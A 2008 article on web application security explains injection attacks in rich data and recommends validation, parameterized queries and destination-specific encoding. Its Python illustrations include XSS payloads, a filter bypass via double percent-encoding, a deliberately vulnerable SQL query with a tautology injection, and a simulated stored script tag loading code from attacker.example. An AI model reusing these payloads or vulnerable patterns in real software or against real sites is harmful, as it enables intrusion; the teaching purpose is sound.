Original URL: https://www.theregister.com/2008/08/01/rich_data_vulnerabilities/

Rich data: the dark side to Web 2.0 applications

With great programming comes great responsibility

By Jeff Williams

Posted in Channel, 1st August 2008 15:02 GMT

All web applications allow some form of rich data, but that rich data has become a key part of Web 2.0. Data is "rich" if it allows markup, special characters, images, formatting, and other complex syntax. This richness allows users to create new and innovative content and services.

Unfortunately, richness affords attackers an unprecedented opportunity to bury attacks targeting users and systems downstream of the offending application or service supplier.

Even in the early days of Web 2.0, this is a huge problem: at least half the vulnerabilities that plague web applications and web services involve some form of injection.

The software industry already has a poor reputation for delivering software that doesn't work or contains security holes. Imagine how bad things will get in a world where people pick up vulnerabilities and hacks by connecting to dynamic web sites and "mashing up" applications.

Here are some things to bear in mind, to protect both your reputation and your users' systems and data.

Unscramble the egg

One of the oldest security principles in the book is that you should always keep code and data separate. Once you mix them together, it's almost impossible to separate them again. Unfortunately, most of the data formats and protocols we're using today mix code and data like a bad DJ hashing up a cross fade. That's why injection is going to be with us for a long time.

HTML is one of the worst offenders. JavaScript code can be placed in a huge number of places with dozens of different forms and encodings - see the XSS cheatsheet for some examples. HTML allows JavaScript in the header, body, dozens of event handlers, links, CSS definitions, and style attributes.

There's no simple validation that can detect all the variants of code in all these places. Instead, you need a full security parser to validate HTML data before you can use it.
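To make the point concrete, here is a minimal Python sketch of why a simple pattern check falls short. The `naive_filter` function and the sample strings are hypothetical, invented for illustration; they stand in for the kind of blacklist many applications rely on.

```python
import re

def naive_filter(html_text: str) -> str:
    """Hypothetical blacklist filter: removes <script>...</script> blocks only."""
    return re.sub(r"<script\b.*?</script>", "", html_text,
                  flags=re.IGNORECASE | re.DOTALL)

# Illustrative payloads, one per location mentioned in the article.
samples = [
    '<script>alert(1)</script>',                  # script element
    '<img src="x" onerror="alert(1)">',           # event handler attribute
    '<a href="javascript:alert(1)">click</a>',    # javascript: URL in a link
    '<div style="background:url(javascript:alert(1))">',  # style attribute, historically honored by some older browsers
]

# Anything that is not reduced to an empty string slipped past the filter.
survivors = [s for s in samples if naive_filter(s) != ""]
print(f"{len(survivors)} of {len(samples)} payloads survived the filter")
```

Only the first payload is caught. Adding more patterns to the blacklist does not close the gap, because each new encoding or location needs yet another pattern.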

Untrusted data is code

Almost everything connected to the internet will execute data if an attacker buries the right kind of code in it. The code might be JavaScript, VB, SQL, LDAP, XPath, shell script, machine code or a hundred others depending on where that data goes.

SQL injection is just an attacker sneaking malicious SQL inside user input that gets concatenated into a query. Injected code isn't just a snippet anymore - it might be a huge program.
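A small sketch of that concatenation problem, using Python's built-in sqlite3 module and an in-memory database. The `users` table, its contents, and the `find_user_unsafe` function are assumptions made up for this example, and the function is vulnerable on purpose.

```python
import sqlite3

conn = sqlite3.connect(":memory:")
conn.execute("CREATE TABLE users (name TEXT, secret TEXT)")
conn.executemany("INSERT INTO users VALUES (?, ?)",
                 [("alice", "a-secret"), ("bob", "b-secret")])

def find_user_unsafe(name: str):
    # Vulnerable on purpose: the input becomes part of the SQL text itself.
    query = "SELECT name, secret FROM users WHERE name = '" + name + "'"
    return conn.execute(query).fetchall()

normal = find_user_unsafe("alice")          # one matching row
injected = find_user_unsafe("' OR '1'='1")  # the WHERE clause is now always true

print(normal)
print(injected)
```

The second call asks for a user whose "name" is really a fragment of SQL, and the database returns every row in the table.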

What's important to remember is that every piece of untrusted data - every form field, every URL parameter, every cookie, and every XML parameter - might contain injected code for some downstream system. If you're not absolutely sure there is no code in the data - and that's pretty much impossible - then for all you know, that data is really a little program. There is no such thing as plain old "data" anymore.

Think about HTML for a minute. We don't really "view" web pages anymore. They're programs. We "run" them in our browser. Even a tiny fragment of HTML can contain a script. Even without JavaScript, web pages can be used for Cross-Site Request Forgery (CSRF) attacks that perform a series of functions for the attacker. That's a kind of program too.

Would you open an HTML document sent to you?

Chain-gang attack

Attackers have now started to chain these attacks and use them in multiple stages. Consider the recent massive bot attacks that used SQL injection to jam JavaScript code into all the strings in a database. The infected data gets used in a web page and the attack redirects the victim's browser to a site that installs malware. You can imagine attacks that are passed from system to system before they are ever executed and their payload is realized.
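The two stages can be sketched in a few lines of Python. This is an illustrative simulation only, not a reconstruction of any real attack: the `products` table, the render functions, and the `attacker.example` URL are all hypothetical, and a plain UPDATE stands in for whatever SQL the attacker managed to inject.

```python
import html
import sqlite3

db = sqlite3.connect(":memory:")
db.execute("CREATE TABLE products (title TEXT)")
db.execute("INSERT INTO products VALUES (?)", ("Blue widget",))

# Stage 1 (simulated): injected SQL appends a script tag to every stored string.
db.execute("UPDATE products SET title = title || ?",
           ('<script src="http://attacker.example/x.js"></script>',))

def render_unsafe() -> str:
    # Stage 2: the page trusts the database and emits the stored string as-is.
    rows = db.execute("SELECT title FROM products").fetchall()
    return "".join(f"<li>{title}</li>" for (title,) in rows)

def render_encoded() -> str:
    # Same page, but stored data is HTML-encoded before it reaches the browser.
    rows = db.execute("SELECT title FROM products").fetchall()
    return "".join(f"<li>{html.escape(title)}</li>" for (title,) in rows)

print(render_unsafe())
print(render_encoded())
```

The database is only a carrier here. The payload does nothing until a page hands it to a browser, which is why data read from your own backend still counts as untrusted.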

One factor that makes detecting these attacks difficult is that the web enables so many different types of encoding. There are more than 100 different character encodings, and we've added higher level encodings such as percent-encoding, HTML-entity encoding, and bbcode on top of those.

The real nightmare here is that anywhere downstream, systems may decode this data and reawaken a dormant attack. So, even if your application isn't vulnerable to injection, someone downstream who uses the data from your application or service might be.
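A short Python sketch of a dormant attack waking up. The `looks_dangerous` check is a hypothetical filter invented for this example; the encoding and decoding calls come from the standard library.

```python
import html
from urllib.parse import quote, unquote

payload = "<script>alert(1)</script>"

def looks_dangerous(text: str) -> bool:
    """Hypothetical filter that only recognises the raw form of the attack."""
    return "<script" in text.lower()

# The attacker percent-encodes the payload twice before submitting it.
encoded_twice = quote(quote(payload, safe=""), safe="")

decoded_once = unquote(encoded_twice)   # what a first system sees after decoding
decoded_twice = unquote(decoded_once)   # what a downstream system sees

print(looks_dangerous(encoded_twice), looks_dangerous(decoded_once),
      looks_dangerous(decoded_twice))

# HTML-entity encoding behaves the same way: harmless until someone decodes it.
entity_form = html.escape(payload)
reawakened = html.unescape(entity_form)
```

The filter passes the data at the first two stages and only the final decode reveals the script tag. Each layer that decodes "helpfully" gives the payload another chance to come back to life.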

As Web 2.0 continues to mash up data from different sources, the likelihood of these attacks increases.

Stamp out injection

You should view untrusted data as though it's malicious code and treat it accordingly: validate, separate, and encode.

Validate: have a whitelist input validation rule for every input - no exceptions. Not just for form fields, but hidden fields, URL parameters, headers, cookies, and all backend systems.
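As a rough sketch of what a whitelist rule per input might look like in Python: the field names and patterns in `RULES` are assumptions chosen for illustration, and a real application would define its own. The key design choice is that an input with no rule is rejected rather than waved through.

```python
import re

# Hypothetical rules: each input is described by what it MAY contain.
RULES = {
    "username": re.compile(r"[A-Za-z0-9_]{3,20}"),
    "zip_code": re.compile(r"[0-9]{5}"),
    "sort_order": re.compile(r"asc|desc"),
}

def validate(field: str, value: str) -> str:
    """Return the value if it matches its rule, otherwise raise ValueError."""
    rule = RULES.get(field)
    if rule is None:
        # No exceptions: an input without a rule is refused outright.
        raise ValueError(f"no validation rule for field {field!r}")
    if not rule.fullmatch(value):
        raise ValueError(f"invalid value for field {field!r}")
    return value

print(validate("username", "alice_01"))
```

The same function would be called for hidden fields, URL parameters, headers, and cookies, not just for visible form fields.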

Separate: don't mix up the data into command strings. Wherever possible, you should use parameterized interfaces, such as PreparedStatement in Java, that prevent injection by keeping code and data separate.
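Python's built-in sqlite3 module offers the same kind of parameterized interface through `?` placeholders, so it serves here as a stand-in for PreparedStatement. This is a minimal sketch; the `accounts` table and the `find_account` function are hypothetical.

```python
import sqlite3

store = sqlite3.connect(":memory:")
store.execute("CREATE TABLE accounts (name TEXT, secret TEXT)")
store.executemany("INSERT INTO accounts VALUES (?, ?)",
                  [("alice", "a-secret"), ("bob", "b-secret")])

def find_account(name: str):
    # The SQL text is fixed; the value travels separately as a bound parameter.
    return store.execute(
        "SELECT name, secret FROM accounts WHERE name = ?", (name,)
    ).fetchall()

print(find_account("alice"))
print(find_account("' OR '1'='1"))  # treated as an odd name, not as SQL
```

The hostile input matches no rows, because the database never interprets it as part of the command.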

Encode: encode untrusted data for the destination. One thing you absolutely have to do, but almost nobody does, is specify the character set you'll be using. Then you'll need a set of methods that apply the proper encoding for the destination, such as an HTML page, HTML attribute, JavaScript, XPath query, LDAP query and so on.
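A sketch of destination-specific encoding using only the Python standard library. The variable names are made up for illustration, and the JavaScript handling is one plausible approach rather than a complete encoder. The standard library has no encoders for XPath or LDAP, so those destinations would need a dedicated, vetted library.

```python
import html
import json
from urllib.parse import quote

# State the character set explicitly instead of letting the browser guess.
CONTENT_TYPE = "text/html; charset=utf-8"

untrusted = '"><script>alert(1)</script>'

# HTML body text: escape markup characters.
for_html_body = html.escape(untrusted, quote=False)

# HTML attribute value: quotes must be escaped as well.
for_html_attr = html.escape(untrusted, quote=True)

# URL parameter: percent-encode everything outside the unreserved set.
for_url_param = quote(untrusted, safe="")

# JavaScript string literal: JSON-encode, then also escape <, > and & so the
# value cannot close an enclosing script block (an assumption of this sketch).
for_js_string = (json.dumps(untrusted)
                 .replace("<", "\\u003c")
                 .replace(">", "\\u003e")
                 .replace("&", "\\u0026"))

for label, value in [("body", for_html_body), ("attr", for_html_attr),
                     ("url", for_url_param), ("js", for_js_string)]:
    print(label, value)
```

The same input produces four different outputs, which is the point: an encoding that is safe for one destination is not necessarily safe for another.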

Show you care

Injection is not a new problem - we've known about it for decades. The body of knowledge on XSS and SQL injection is extensive. If your system forwards an attack to an innocent victim, though, you not only make yourself look bad but in the Web 2.0 world there's a chance your software will lead to a wider proliferation of attacks than was possible in the bad old days.

Jeff Williams is the founder and CEO of Aspect Security and the volunteer chair of the Open Web Application Security Project. His latest project is the Enterprise Security API, a free and open set of foundational security building blocks for developers.